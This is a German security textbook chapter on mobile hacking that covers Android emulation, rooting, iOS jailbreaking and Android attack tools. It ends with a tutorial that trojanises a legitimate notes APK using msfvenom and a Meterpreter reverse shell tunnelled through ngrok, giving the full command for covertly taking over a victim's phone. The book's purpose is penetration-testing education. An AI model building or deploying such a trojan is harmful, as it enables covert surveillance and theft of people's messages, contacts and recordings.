Nachdem wir nun einige Grundsteine gelegt haben, wird es Zeit, in die Praxis zu gehen. Zunächst schaffen wir eine Möglichkeit, das Android-Betriebssystem auf dem PC zu verwenden. Anschließend betrachten wir verschiedene, relevante Aspekte des Mobile Hackings.
29.3.1 Android über den PC
In diesem Abschnitt werden wir Ihnen ein paar hilfreiche Anwendungen an die Hand geben, die Ihnen die Arbeit mit dem Smartphone in Kombinationen mit Ihrem PC erleichtern.
Wir empfehlen dringend, keine sicherheitskritischen Tests, wie wir sie im Folgenden zeigen werden, an Ihrem eigenen Smartphone zu testen. Nutzen Sie hierfür ein »Spielgerät«, das Sie ggf. noch aus früherer Zeit in der Schublade haben, oder kaufen Sie ein günstiges Android-Gerät für deutlich unter 100 Euro. Achten Sie darauf, dass Ihr Gerät von der Internet-Community gut unterstützt wird, um Tutorials und ggf. Hilfe in Foren zu finden. Bestimmte Vorgehensweisen, insbesondere im Zusammenhang mit dem Rooting, sind gerätespezifisch, sodass eine Unterstützung im Internet essenziell ist.
Haben Sie nicht die Möglichkeit, auf ein solches Testgerät zurückzugreifen, stellen wir Ihnen in diesem Abschnitt noch Alternativen vor.
PC-Fernsteuerung und Zugriff auf ein Smartphone
Um ein mobiles Endgerät mit dem Computer zu verbinden und auf dessen Daten zugreifen zu können, genügt meist ein entsprechendes USB-Kabel. Noch komfortabler gestaltet sich dies allerdings mit einer Software wie Vysor (www.vysor.io) oder AirDroid (www.airdroid.com). Damit wird es nach einer Anmeldung möglich, alle Vorgänge und Inhalte Ihres Mobilgeräts auf dem PC-Bildschirm anzuzeigen und das Endgerät sogar zu steuern. Zudem haben Sie die Möglichkeit, auf die Dateien des gekoppelten Smartphones oder Tablets über Ihren PC zuzugreifen. Es existieren noch weitere Tools dieser Art, die genannten Anbieter unterstützen sowohl Android als auch iOS. Auch Fernwartungssoftware wie TeamViewer (www.teamviewer.com) oder AnyDesk (https://anydesk.com) unterstützen den Zugriff auf mobile Geräte und bieten die oben genannten Funktionen.
Wie so oft steht hier auch wieder Komfort der Sicherheit gegenüber. So bequem es ist, das mobile Gerät über den PC zu steuern und auf die Daten zuzugreifen, genauso gefährlich ist es auch, wenn dies ein anderer tut. Setzen Sie diese Art von Software daher nur mit Bedacht ein.
Android-Emulation
Wie wir bereits erwähnt haben, gibt es Alternativen, mit denen Sie um den Kauf eines Android-Endgeräts herumkommen und Android-Apps auch auf dem PC ausführen können. Eine davon ist BlueStacks (www.bluestacks.com), eine kostenlose Android-Emulator-Software.
Sie basiert auf VirtualBox und wird zum Ausführen von Android-Apps unter Windows und macOS verwendet. Abbildung 29.2 zeigt den Play Store innerhalb einer BlueStacks-Instanz.
Hauptsächlich wird BlueStacks verwendet, um Spiele aus dem Google Play Store auf dem PC auszuführen. Es können allerdings auch andere Apps getestet werden.
Virtualisierung von Android
Eine weitere Möglichkeit, Android auf einem PC auszuführen, bietet das Open-Source-Projekt Android x86 (www.android-x86.org). Das Projekt hat es sich zur Aufgabe gemacht, ein Betriebssystem zu entwickeln, das auf ARM-Prozessoren ausgelegte Android auch für PCs mit x86-x64-Architektur lauffähig zu machen. Die nachfolgende Anleitung beschreibt den Installationsprozess in Kurzform und ist am einfachsten nachvollziehbar, wenn Sie die Schritte direkt praktisch mitverfolgen.
Sie können das Betriebssystem als ISO-Datei von der oben angegebenen Adresse herunterladen und als neue virtuelle Maschine in VirtualBox installieren. Wie Sie grundsätzlich eine neue VM in VirtualBox erstellen können, haben wir in Kapitel 2 bei der Einrichtung Ihrer Arbeitsumgebung ausführlich beschrieben. Beachten Sie bei Android x86, dass Sie beim Einrichten als Typ Linux und die Version Linux 2.6/3.x/4.x (je nach Version 32 oder 64 Bit) auswählen. Für das virtuelle System empfehlen wir Ihnen 2048 MB Arbeitsspeicher und eine Festplattenspeichergröße von 10 GB. Nachdem die Maschine erstellt wurde, können Sie sie direkt starten. Sie werden daraufhin aufgefordert, ein Medium für den Bootvorgang auszuwählen. Wählen Sie hier die Android-x86-ISO-Datei aus und klicken Sie auf starten.
Es startet der Installer von Android x86. Sie können das Betriebssystem als Live-Version starten oder installieren. Wählen Sie für eine Installation den Eintrag Installation - Install Android x86 to harddisk. Im Anschluss müssen Sie eine entsprechende Partition erstellen, Sie können bei den Default-Einstellungen bleiben und benötigen keine GUID Partition Table (GPT).
Im Partitionierungs-Menü gehen Sie auf New und wählen die Option Primary aus. Die Größe müssen Sie nicht anpassen und können die komplette Festplattenkapazität verwenden. Bevor Sie nun mit Write bestätigen, wählen Sie noch die Option Bootable aus. Dann können Sie die Änderungen auf die Festplatte schreiben. Ist der Vorgang abgeschlossen, verlassen Sie das Partitionierungsprogramm über Quit. Abschließend wählen Sie die erstellte Partition aus, um Android-x86 darauf zu installieren.
Für das Filesystem wählen Sie im Folgenden ext4 und formatieren Ihre Partition entsprechend. Die Installation von GRUB und die Frage nach install /system directory as read-write müssen Sie mit YES bestätigen. Danach startet die Installation. Ist diese abgeschlossen, erhalten Sie einen entsprechenden Hinweis. Entfernen Sie nun die ISO-Datei aus Ihrem virtuellen Laufwerk und starten Sie Android-x86 von der Festplatte.
Wird nach dem Start von Android-x86 keine grafische Oberfläche angezeigt (der Bootprozess bleibt scheinbar im Terminal hängen), so ist eine Anpassung in den Einstellungen der VirtualBox unter Anzeige notwendig. In der Vergangenheit waren in verschiedenen VirtualBox-Versionen leider auch unterschiedliche Anpassungen nötig. Für VirtualBox 7.0 belassen Sie die 3D-Beschleunigung deaktiviert und wählen als Grafik-Controller VBoxVGA aus. Falls dies in Ihrem Szenario nicht zum Erfolg führt, konsultieren Sie die einschlägigen Internetforen oder experimentieren Sie selbst mit verschiedenen Einstellungen der Anzeige.
Nach dem erfolgreichen Start finden Sie nun Ihr Android im Auslieferungszustand vor und durchlaufen den Einrichtungsassistenten analog zu dem auf einem mobilen Endgerät. Um sich mit einem WLAN zu verbinden bzw. eine Internetverbindung zu etablieren, stellen Sie wie in Abbildung 29.3 Ihre virtuelle Maschine in den Netzwerkeinstellungen auf Netzwerkbrücke ein und verbinden sich dann mit dem gefundenen Drahtlosnetzwerk VirtWifi.
In den folgenden Schritten richten Sie Ihr Android ein. Sie können dabei auch ein vorhandenes Google-Konto verwenden.
Beachten Sie, dass per Default das US-Tastatur-Layout aktiv ist und Sie beispielsweise bei der Eingabe Ihrer E-Mail-Adresse für das Google-Konto darauf achten müssen. Die Tastenkombination Shift+2 ist notwendig, um das @-Zeichen einzugeben.
Nun ist es geschafft, nach der Einrichtung steht Ihnen, analog zu Abbildung 29.4, eine virtuelle Android-Testumgebung auf Ihrem PC zur Verfügung. Diese können Sie z.B. später in Abschnitt 29.3.6 einsetzen, um den dort erstellten Trojaner auszuführen und die Reverse-Shell zu testen.
29.3.2 Android-Rooting
Das Ziel beim Rooten von Android besteht darin, die von den Herstellern auferlegten Einschränkungen zu überwinden. Nachdem Sie dieses Ziel erreicht haben, steht Ihnen die Welt Ihres Smartphones offen. Sie haben damit Root-Rechte und somit das Recht, unter anderem Sandboxing zu überwinden, Systemanwendungen und -konfigurationen zu modifizieren, Apps mit Admin-Rechten auszuführen und weitere Möglichkeiten, auf die der reguläre Android-Benutzer normalerweise keinen Zugriff hat. Sie können sogar eine ganz eigene Custom-ROM, also ein alternatives Android-Betriebssystem, auf das Smartphone spielen. Das ist beispielsweise von Vorteil, wenn der Hardware-Hersteller keine weiteren Updates für das Gerät veröffentlicht. Zudem ist eine verbesserte Leistungsfähigkeit zu erkennen.
Risiken beim Rooting
Klingt gut? Natürlich! Aber Vorsicht, mit dem Rooten eines Endgeräts setzen Sie sich diversen Risiken aus. Sie sollten hierbei wissen, was Sie tun, und sich im Vorfeld genau über das Vorgehen informieren. Der Prozess ist bei jedem Endgerät etwas anders und sehr oft nicht trivial. Sollte beim Root-Prozess etwas schieflaufen, ist Ihr Smartphone im schlimmsten Fall nicht mehr brauchbar. Man spricht hierbei von einem Hard Brick, einem nicht mehr reparierbaren Gerät. Da normalerweise alle Hersteller in ihren AGBs darauf hinweisen, dass die Garantieansprüche nach einem Root-Vorgang verfallen, bringt auch die Kontaktaufnahme mit dem Hersteller in der Regel nichts.
Durch das Rooten verliert der Anwender Garantieansprüche, aber unter Umständen nicht die Gewährleistungsansprüche. Wenn beim Rooten etwas kaputtgeht, dann wird der Hersteller wohl kaum ein Ersatzgerät bereitstellen. Sollte allerdings bei einem gerooteten Smartphone der Lautsprecher nicht mehr richtig funktionieren, gilt die Gewährleistung weiterhin.
Es kann auch passieren, dass manche Apps nicht mehr wie gewohnt funktionieren. Das kann unter anderem daran liegen, dass diese auf den SafetyNet-Service des Systems zugreifen. Dabei handelt es sich um eine Sicherheitskomponente von Google zum Schutz vor unbefugtem Zugriff auf sensible Daten. Apps prüfen den Systemstatus über SafetyNet und können bei Nichtbestehen der Prüfung ihre Funktion verweigern.
Der Root-Vorgang modifiziert diesen Status, sodass SafetyNet der betroffenen App zurückmeldet, dass das Gerät gerootet wurde. Das hat die Auswirkung, dass die Anwendung nicht oder nur mit Einschränkungen startet. Häufig ist dies bei Banking-Apps, Google Pay oder anderen sicherheitskritischen Anwendungen der Fall.
Auch die automatischen Systemupdates können nach dem Rooten nicht mehr durchgeführt werden. Dies ist ab diesem Zeitpunkt nur noch manuell möglich. Ein weiterer Nachteil kann sich in der Sicherheit Ihres Geräts widerspiegeln. Denken Sie daran: Je mehr Rechte vorhanden sind, umso verwundbarer wird Ihr System. Sie merken sicher schon, dass ein gerootetes Handy viel Verantwortung mit sich bringt. Sie sollten sich wirklich gut auskennen, wenn Sie ein gerootetes Smartphone betreiben möchten.
Grundüberlegungen
Wie bereits beschrieben, gestaltet sich der Vorgang zum Rooten eines Smartphones bei jedem Endgerät etwas anders. Es existiert auch nicht immer nur ein Weg zum Ziel. Manchmal gibt es verschiedene Möglichkeiten, manchmal gar keine, je nach Hardware und Hersteller. In den meisten Fällen flashen Sie manuell ein passendes Rootkit über eine Custom Recovery (Details dazu folgen).
Für manche Geräte können Apps wie KingRoot oder TowelRoot verwendet werden. Mit diesen sogenannten »One Click Root Apks« kann es recht einfach sein, einen Root-Zugriff zu erlangen. Es ist lediglich die Installation der jeweiligen App notwendig, um diese auszuführen. Dies empfehlen wir Ihnen allerdings nicht, da dieser Vorgang in den meisten Fällen nicht korrekt funktioniert und Sie keinerlei Kontrolle über die Prozesse im Hintergrund haben.
Wir geben Ihnen nachfolgend ein sehr generisches Beispiel für die grundsätzlichen Schritte eines manuellen Root-Vorgangs.
Wir haben es bereits erwähnt: Wenn Sie den Versuch starten wollen, Ihr Smartphone zu rooten, seien Sie sich bitte der folgenden Tatsache bewusst: Sowohl die gespeicherten Daten als auch Ihre Garantie gehen damit ziemlich sicher verloren. Zudem besteht die Gefahr eines Hard Bricks, also eines nicht mehr reparierbaren Defekts des Geräts.
Bevor Sie beginnen, sollten Sie an das Backup der Daten auf dem betreffenden Smartphone denken, für den Fall, dass Sie diese behalten möchten. Informieren Sie sich gründlich darüber, welches Vorgehen bei Ihrem Smartphone-Typ notwendig ist und welche Software verwendet werden soll. Schauen Sie sich dazu Anleitungen in Foren und einschlägigen Plattformen an und erkundigen Sie sich auch über mögliche Risiken und Probleme. Eine gute Quelle dafür ist das XDA-Forum (https://forum.xda-developers.com).
In unserem Szenario nutzen wir ein günstiges Smartphone des Herstellers Blackview, um es zu »rooten«. Dabei waren folgende Schritte notwendig, die bei vielen anderen Herstellern analog funktionieren. Trotzdem ist zu beachten, dass das Rooting ein sehr individueller und komplexer Vorgang ist.
Vorbereitende Einstellungen
Zunächst ist es notwendig, die Entwickleroptionen des Smartphones anzupassen. Diese schalten wir durch siebenmaliges Tippen auf die Build-Nummer in den Einstellungen frei. Die Build-Nummer befindet sich je nach Android-Version an unterschiedlichen Stellen, hier müssen Sie ggf. etwas suchen, siehe Abbildung 29.5.
Wurden die Entwickleroptionen aktiviert, erscheint eine entsprechende Meldung, und wir finden einen neuen Menüpunkt (Entwickleroptionen) in den Einstellungen. Dort schalten wir USB-Debugging und OEM-Unlock an.
Android Debug Bridge bereitstellen
Das nächste Ziel ist, über die Android Debug Bridge (kurz ADB) vom PC per USB-Kabel Befehle an das Smartphone zu senden. Die ADB ist eine Schnittstelle, die für diesen Zweck entwickelt wurde. Damit können wir vom PC auf Komponenten des Android-Systems zugreifen.
Je nach Windows-Version und Hardware-Plattform sind dafür ggf. zusätzliche Treiber für den PC notwendig. Ab Windows 10 sind die erforderlichen Treiber oftmals schon integriert. Sollte eine Verbindung über ADB nicht möglich sein, können die entsprechenden OEM-Treiber von der Herstellerseite der Computer-Hardware heruntergeladen werden. Eine Übersicht darüber erhalten Sie unter https://developer.android.com/studio/run/oem-usb#Drivers.
Sind die korrekten Treiber auf dem System installiert, benötigen wir noch die passende Software in Form von ADB und Fastboot. Mit Fastboot ist es möglich, Images direkt auf eine Partition des internen Speichers zu »flashen«. Diese beiden Tools bzw. Funktionen sind im Software Development Kit von Android enthalten (https://developer.android.com/studio/releases/platform-tools) oder separat als neueste Version unter https://dl.google.com/android/repository/platform-tools-latest-windows.zip herunterzuladen.
Nachdem wir den Download in Form eines ZIP-Archivs entpackt haben, verbinden wir das Smartphone über die USB-Schnittstelle mit dem PC und navigieren mit der Eingabeaufforderung oder der PowerShell in das Verzeichnis, in dem sich die entpackten Dateien befinden. Dort geben wir den Befehl adb devices in das Terminal ein, damit das Smartphone mithilfe der Treiber korrekt erkannt wird. Mit adb help werden die Hilfeseiten von adb.exe inklusive vorhandener Parameter angezeigt, siehe Abbildung 29.6.
Damit sind die Voraussetzungen gegeben, Kommandos über ADB abzusetzen.
Fastboot und Custom-Recovery
Unser Ziel ist nun, über den Fastboot-Mode die Stock-Recovery durch ein eigenes Custom-Recovery auszutauschen. Als Stock-Recovery wird das vom Hersteller mitgelieferte Grundsystem zur Wiederherstellung des Smartphones bezeichnet, eine Art Minimal-Android-Betriebssystem. Dieses ersetzen wir durch ein angepasstes Grundsystem, das Custom-Recovery, mit dem wir die Basisfunktionen erweitern, um das Gerät zu rooten.
Bevor wir dies allerdings tun, sollten Sie wissen, was es damit auf sich hat und wie der Bootvorgang eines Android-Systems aufgebaut ist. Beim Anschalten des Geräts wird als einer der ersten Vorgänge nach dem Laden des BIOS der Bootloader initialisiert. Der Bootloader veranlasst darauf den Start des Kernels, der im Anschluss das Android-Betriebssystem (auch Android-ROM genannt) lädt. Alternativ zum Kernel kann auch das Android-Recovery geladen werden. Damit ist es möglich, auf das Gerät zuzugreifen, selbst wenn das Android-ROM (das eigentliche Betriebssystem) beschädigt ist. Abbildung 29.7 verdeutlicht die Zusammenhänge.
Der Fastboot ist eine Art erweiterter Bootloader. Die Funktion entspricht generell der eines Bootloaders, geht allerdings noch darüber hinaus. So ist es im Fastboot-Mode zum Beispiel möglich, den Bootloader zu entsperren, um dadurch das Laden eines eigenen Recoverys, des Custom Recovery, zu ermöglichen.
Da dies unser Ziel ist, booten wir mithilfe von ADB das Smartphone in den Fastboot-Mode. Der Befehl dazu lautet adb reboot bootloader. Sobald dieser abgesetzt wurde, startet das Endgerät neu und befindet sich darauf im Fastboot-Mode.
Der Fastboot-Mode ist auch über das Halten einer bestimmten Tastenkombination am Endgerät während des Einschaltens zu erreichen. Während diese allerdings bei jedem Endgerät etwas variiert, ist der Weg über ADB immer gleich.
Den Bootloader entsperren
Der Fastboot-Mode zeigt im Display des Smartphones eine Art interaktive Kommandozeile, die mit den Tasten gesteuert werden kann. An diesem Punkt entsperren wir den Bootloader, um das Custom Recovery laden zu können. Dabei hilft uns das Tool Fastboot, das wieder über die Eingabeaufforderung am PC gesteuert wird. Der Befehl fastboot help zeigt die entsprechende Hilfeseite. Der nun benötigte Befehl lautet fastboot oem unlock. Je nach Hersteller sind noch weitere Angaben wie beispielsweise ein Unlock-Code bzw. eine Unlock-Datei notwendig, um diesen Schritt durchzuführen. Die Freischaltung des Bootloaders muss am Smartphone bestätigt werden. Da der Touchscreen keine Funktion hat, ist die Eingabe meist über die Lautstärketasten möglich.
Haben Sie den Bootloader freigeschaltet, startet das Gerät in der Regel neu und lädt das Android-Betriebssystem in den Werkseinstellungen. Mit einem freigeschalteten Bootloader ist es nun möglich, ein eigenes Recovery auf das Gerät zu flashen. Dies gelingt erneut über den Fastboot-Mode. Um diesen wieder zu erreichen, sind die bereits beschriebenen Schritte notwendig (USB Debugging aktivieren und anschließend mit adb reboot bootloader den Fastboot-Mode starten).
Das Recovery flashen
Custom-Recoverys werden von alternativen Entwicklern, also nicht vom Gerätehersteller, angeboten. Diese haben einen erweiterten Funktionsumfang, den wir für die weiteren Schritte benötigen. Derzeit beliebt ist das TeamWinRecoveryProject (TWRP), das Sie passend für Ihr Endgerät unter https://twrp.me/Devices herunterladen können. Ist Ihr Endgerät nicht aufgeführt, hilft Ihnen eine Suche nach »TWRP <Gerätebezeichnung> Recovery« weiter. Meist finden Sie sich darauf in einem der einschlägigen Foren wieder, in dem die Community eine IMG-Datei als passendes Recovery für Ihr Gerät zum Download bereitstellt.
Liegt uns ein geeignetes Custom-Recovery vor und befinden wir uns im Fastboot-Mode des Smartphones, können wir das alternative Recovery mit dem Befehl fastboot flash revovery <twrp-Datei> auf das Gerät »flashen«. Ist dieser Vorgang abgeschlossen, booten wir mit dem Befehl fastboot reboot recovery in das soeben installierte Custom-Recovery, siehe Abbildung 29.8.
Mit diesem Recovery können wir unter anderem komplette Backups erstellen, auf die gespeicherten Daten zugreifen, Custom-ROMs (also Android-Betriebssysteme von Drittherstellern) installieren oder den Root-Zugriff einrichten. Letzteres ist unsere nächste Aufgabe.
Den Root-Zugriff etablieren
Um den Root-Zugriff zu etablieren, muss ein Skript ausgeführt werden. Hier gibt es diverse Alternativen. Wir haben gute Erfahrungen mit Magisk gemacht, das unter https://github.com/topjohnwu/Magisk in Form einer ZIP-Datei erhältlich ist. Diese Datei haben wir nach dem Start des Smartphones in den Werkseinstellungen auf das Gerät kopiert.
Nun wählen wir in TWRP den Button Install und dort das Magisk-Archiv aus. Der Touchscreen wird von den meisten TWRP-Versionen unterstützt, alternativ kann mit den Lautstärketasten navigiert und mit dem An-/Ausschalter bestätigt werden. Nachdem wir die Datei erfolgreich installiert haben, starten wir das Gerät neu. Nach dem Neustart finden wir nicht nur eine neue App (Magisk) unter den Anwendungen, sondern wir haben nun Root-Zugriff auf das System.
Den Root-Status überprüfen
Dies können wir ganz einfach über diverse Apps im Play Store überprüfen lassen (zum Beispiel mit Root Checker). Für den Test müssen wir der Root Checker-App entsprechenden Root-Zugriff gewähren und bestätigen. Abbildung 29.9 zeigt die erfolgreiche Prüfung.
Jetzt sind wir ohne Einschränkungen Herr über das Android-System. Möglichkeiten, dies zu nutzen, gibt es viele. Wir können nun auch Apps installieren, die Root-Rechte erfordern. Zum Beispiel ist es möglich, mit Titanium Backup Pro Sicherungen von allen Apps zu erstellen oder mit dem System Tuner Pro das System zu optimieren. Auch einige Apps, die zum Hacking genutzt werden können, erfordern Root-Rechte. Diese lernen Sie in Abschnitt 29.3.5 kennen.
29.3.3 Jailbreaking iOS
Analog zum Root-Zugriff unter Android werden bei einem iOS Jailbreak alle Restriktionen, denen ein iOS-Gerät unterliegt, entfernt. Man bricht im Grunde aus dem »Gefängnis« (engl. jail) aus, das Apple in das iOS eingebaut hat. Dabei liegt der Fokus nicht nur auf den klassischen iPhones, sondern auch auf Produkten wie iPad, iPod Touch und Apple TV. Denn auch darauf kann grundsätzlich ein Jailbreak durchgeführt werden.
Generell lässt sich beim Jailbreaking die gleiche Liste über Pro und Kontra aufstellen wie beim Rooting eines Android-Systems. Der Grundsatz bleibt bestehen: Nur wer sich über die Risiken und der Verantwortung bewusst ist, sollte den uneingeschränkten Zugriff auf die Systemdateien anstreben.
Jailbreaking ist nicht so weit verbreitet wie das Rooting unter Android, was verschiedene Gründe hat. Während Android ohnehin ein offenes, flexibles und leicht erweiterbares (und damit manipulierbares) System ist, legt Apple mit seinem iOS Wert auf ein geschlossenes Ökosystem. Durch den hohen Grad an Kontrolle und Abschottung seitens des Herstellers existieren für neuere iOS-Versionen weniger Schwachstellen, um einen Jailbreak durchzuführen.
Bei Android ist das Rooting abhängig vom Hersteller nicht zwangsläufig ausgeschlossen. Dagegen ist ein Jailbreak des iOS von Apple immer nur durch das Ausnutzen einer Schwachstelle (Exploit) möglich. Diese geht je nach Gerätetyp von einer Sicherheitslücke im iOS-Betriebssystem oder einem Designfehler in der Hardware aus. Die ersten Jailbreaks nutzten einen Hardware-Fehler und wurden über den DFU-Modus (Device Firmware Update) durchgeführt. Dieser Modus wird eigentlich dazu verwendet, das iPhone neu zu installieren, wenn es nicht mehr startet oder nicht mehr reagiert.
Heute gibt es auch Jailbreaks, die bei hochgefahrenem Betriebssystem installiert werden. Diese nutzen einen Fehler im iOS aus und werden Userland-Exploits genannt.
Für beide Varianten ist für gewöhnlich ein PC oder Mac notwendig, auf dem das Jailbreaking-Programm läuft. Bekannt sind z.B. Pangu, evasi0n, Absinthe oder redsn0w. Im November 2019 wurde mit Checkra1n ein erster öffentlicher Jailbreak für iOS 13 veröffentlicht. Dabei wird ein Boot-ROM-Exploit genutzt, um das Ausführen beliebiger Software zu ermöglichen – dies kann nicht gepatcht werden. Die Schwachstelle konnte bis zum iPhone X ausgenutzt werden, erforderte jedoch bei jedem Neustart einen erneuten Jailbreak-Prozess.
Software-Exploits aus externen Quellen, die direkt im iOS z.B. mithilfe des Safari-Browsers gestartet werden, sind sehr selten. Diese werden schnell entdeckt und die Schwachstelle wird in der Regel von den Entwicklern mit einem Software-Update behoben.
Wurde ein Jailbreak erfolgreich durchgeführt, ist der Anwender nicht mehr an den App Store gebunden und kann damit Apps von Drittanbietern installieren. Im Gegensatz zu Android ist dies bei iOS normalerweise nicht möglich.
Im Internet angebotene Jailbraking-Software gibt sich oft lediglich als solche aus und ist in Wirklichkeit Fake. Stattdessen versteckt sich Schadsoftware dahinter ohne entsprechende Jailbreaking-Funktion.
29.3.5 Hacking-Tools für Android
So wie es Hacking-Tools für Linux oder Windows als Plattform gibt, existiert genauso auch eine Vielzahl mehr oder weniger guter Hacking-Tools für Android. Einige haben wir schon im Laufe dieses Buches an verschiedenen Stellen erwähnt.
Um beispielsweise mit dem Smartphone anonym zu bleiben, haben Sie die Möglichkeit, Tor Browser oder Orbot zu nutzen. Um sensible Daten zu schützen, können Sie, wie im Kryptografie-Kapitel erwähnt, den Secret Space Encrypter verwenden. Weiter lohnt sich ein Blick auf Fing. Hierbei handelt es sich um einen guten Netzwerk-Scanner mit erweiterten Funktionen wie beispielsweise Portscan oder DNS-Lookup.
Auch eine Android-Variante von Nmap ist frei verfügbar. Um allerdings terminalbasierte Apps wie Nmap oder auch Metasploit auf Ihrem Android-Gerät nutzen zu können, benötigen Sie eine entsprechende Konsole. Diese kann Ihnen der Terminal-Emulator Termux zur Verfügung stellen. Die App beziehen Sie ganz einfach über den Play Store. Nachdem Sie Termux gestartet haben, können Sie Nmap mit dem Befehl pkg install nmap installieren und erhalten dabei noch zusätzlich das bereits bekannte Tool netcat. Sie können damit zum Beispiel Reverse-Shells mit Ihrem Smartphone entgegennehmen. Um einen vollen Funktionsumfang für diese Anwendungen zu erhalten, muss Ihr Android allerdings gerootet sein (vgl. Abbildung 29.10).
Generell ist es sogar möglich, alle Linux-Programme unter Android laufen zu lassen. Dazu ist allerdings eine Linux-Umgebung in Form eines reinen Terminals (keine Emulation) und ggf. bei Anwendungen mit grafischer Oberfläche ein X-Server erforderlich. Diese Umgebung kann entweder recht aufwendig konfiguriert und eingerichtet werden oder Sie nutzen die App UserLAnd. Diese ist kostenfrei im App-Store verfügbar und nimmt Ihnen sämtliche Arbeit im Hintergrund ab. Nach erfolgreicher Installation können Sie entweder über SSH oder VNC (dabei ist ein entsprechender Viewer notwendig) auf Linux-Anwendungen zugreifen (Abbildung 29.11).
Die App UserLAnd stellt neben Anwendungen auch ganze Distributionen wie Kali Linux, Debian und Arch Linux zum Download bereit. Beachten Sie, dass es sich um Basisinstallationen handelt und hier die meisten Tools, wie z.B. Metasploit (apt-get install metasploit-framework), noch nachinstalliert werden müssen.
Wer ein Penetration-Testing-Toolkit für Android sucht, ist mit zAnti von Zimperium gut beraten (www.zimperium.com/zanti-mobile-penetration-testing). Sie können die App direkt von der Herstellerseite herunterladen und unter Android installieren. Bitte beachten Sie, dass Ihr Gerät für die Ausführung gerootet sein muss. Neben einem umfassenden Netzwerk-Scan, inklusive Port- und Vulnerability-Scan, bietet Ihnen zAnti unter anderem die Möglichkeit, diverse MITM-Angriffe durchzuführen. Hier lohnt es sich, einen Blick auf die zahlreichen Funktionen zu werfen (vgl. Abbildung 29.12).
Mit WiFiKill (ebenfalls Root-Rechte erforderlich) können Sie DoS-Angriffe auf Wireless-Umgebungen durchführen. Wozu diese Aktion auch im Rahmen eines Penetrationstests sinnvoll sein kann, haben Sie bereits im letzten Kapitel gesehen.
Seien Sie besonders vorsichtig bei angeblichen Android-Hacking-Tools von Drittanbietern. Denn meistens holen Sie sich dabei selbst einen Trojaner ins Haus. Vermeintliche »WhatsApp-Sniffer« beispielsweise, die scheinbar Nachrichten aller im WLAN verbundenen Clients mitlesen können, sind Fake! Derartige Apps gibt es (zurzeit) nicht. Das merken Sie spätestens dann, wenn das Versprochene zum einen nicht funktioniert und zum anderen plötzlich wie von Geisterhand weitere Apps auf dem Smartphone nachinstalliert werden.
Genauso wie für alle anderen Betriebssysteme werden Sie für viele Zwecke auch eine passende App für Android finden. Ihr Vorteil dabei ist, dass Sie mit einem Mobilgerät optisch sehr unauffällig Angriffe durchführen können.
29.3.6 Android-Tojaner erstellen
Im nun folgenden Abschnitt zeigen wir Ihnen, wie Sie selbst eine Malware für Android erstellen können. Damit sind Sie in der Lage, vollen Zugriff auf das Smartphone des Opfers zu bekommen. Sie können dann zum Beispiel Kontaktlisten, Gesprächsprotokolle und Nachrichten herunterladen, die GPS-Koordinaten abfragen, Screenshots aufnehmen, die Kamera oder das Mikrofon aktivieren und sich entsprechende Aufnahmen zusenden, oder Sie verschicken SMS-Nachrichten, ohne dass das Opfer etwas davon mitbekommt.
Wenden Sie dieses Wissen nur auf Ihrem Testgerät bzw. im Rahmen eines genehmigten Penetrationstests an! Wie Sie wissen, ist das Eindringen in fremde Geräte mit derartigen Mitteln unter normalen Umständen strafbar!
Doch zur Sache. Das Prinzip ist sehr ähnlich zu unserem PuTTY-Trojaner, den wir in Kapitel 12 Mit Malware das System übernehmen erstellt haben. Zunächst laden wir eine reguläre Anwendung von einem Drittanbieter (z.B. von https://apkpure.com) herunter und bestücken diese mithilfe von msfvenom mit Schadcode. Die Payload soll eine Meterpreter-Reverse-Shell aufbauen, die durch einen Metasploit-Handler entsprechend entgegengenommen wird. Damit das Ganze nicht nur im lokalen WLAN funktioniert, sondern auch über das Mobilfunknetz, nutzen wir den Service von ngrock (https://ngrok.com). Der Dienst nimmt die Reverse-Shell-Anfrage aus dem Internet entgegen und leitet diese in einen TCP-Tunnel auf den Localhost (127.0.0.1) des Angreifers auf den Port um, auf dem der Handler lauscht. Abbildung 29.13 verdeutlicht die Funktionsweise und zeigt, wie der Angriff von Mallory auf Alice schematisch abläuft.
Den Wirt bereitstellen
Im ersten Schritt laden wir uns eine legitime App herunter, die für unseren Trojaner als Wirt dienen soll. Das ist wichtig, damit das Opfer keinen Verdacht schöpft. Die Anwendung kann problemlos installiert und gestartet werden, ohne dass offensichtlich wird, was im Hintergrund passiert. Die folgenden Schritte geschehen auf Kali Linux.
Eine Anwendung, die Notizen speichern kann, ist immer sinnvoll und wer ahnt schon, dass es sich hierbei um eine Schadsoftware handelt? Daher laden wir die Anwendung Notes unter https://apkpure.com/notes/com.bigtexapps.notes auf das Kali-System herunter.
Einrichtung von ngrok
Als weitere Vorbereitung ist eine kostenlose Anmeldung bei ngrok (https://ngrok.com) notwendig. Dieser Dienst stellt den Tunnel zum Angreifer bereit. Haben Sie sich registriert, finden Sie sich im Dashboard des User-Bereichs wieder. Hier werden die nächsten Schritte für die Einrichtung sehr einfach gezeigt, siehe Abbildung 29.14.
Die ersten drei Schritte können wir wie im Dashboard beschrieben durchführen. Dazu ist zunächst ein Download der Software auf unser Kali Linux notwendig. Danach entpacken wir die Datei und verbinden die Software unter Angabe des Tokens, der unter Punkt 3 angezeigt wird, mit unserem Account. Im Anschluss ist ngrok startklar, und wir generieren den TCP-Tunnel auf Port 1234 mit folgendem Befehl:
Ngrok zeigt uns eine Status-Übersicht an, siehe Abbildung 29.15. Es wird ein dynamischer TCP-Tunnel aufgebaut. Die Zeile Forwarding zeigt, dass der Tunnel über die Adresse 4.tcp.eu.ngrok.io:17175 zu erreichen ist und auf unserem System auf localhost:1234 endet. Die Adresse ist individuell.
Den Trojaner erstellen
Nun widmen wir uns der Erstellung des Trojaners. Wie Sie mit dem Tool msfvenom Schadcode erstellen können, haben wir Ihnen bereits in Kapitel 12 Mit Malware das System übernehmen gezeigt. Wir übergeben eine Anwendung, in die wir den Schadcode einbringen möchten. Dazu wird die App zunächst mittels Reverse Engineering auseinandergenommen und im Anschluss wieder zusammengesetzt und signiert. Dieser Vorgang funktioniert nicht bei allen APKs gleichermaßen zuverlässig. Im Zweifel müssen Sie eine geeignete App identifizieren. Wir nutzen Notes, die heruntergeladene Datei benennen wir in notes.apk um.
Jetzt erstellen wir den Android-Trojaner durch die Eingabe des folgenden Befehls, wobei Sie den Namen der APK-Datei und den Tunnelport ggf. anpassen müssen:
sudo msfvenom -x notes.apk --arch dalvik --platform android -p android/meterpreter/reverse_tcp lhost=4.tcp.eu.ngrok.io lport=17175 -o notes-new.apk
